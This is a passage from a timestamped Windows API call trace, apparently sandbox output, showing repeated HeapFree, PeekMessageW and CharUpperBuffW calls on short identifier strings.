returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d9c0 | out: hHeap=0x25c0000) returned 1 [0256.504] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.505] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.505] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.505] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.505] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.505] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.505] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.506] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.506] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.506] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.507] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.509] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.509] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.509] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.510] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.510] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.510] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.510] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.510] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.510] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.511] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.511] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.513] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.513] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.513] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.513] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.513] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.513] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.513] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.513] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.513] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.513] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.513] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.513] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.513] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.513] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.513] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.513] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd 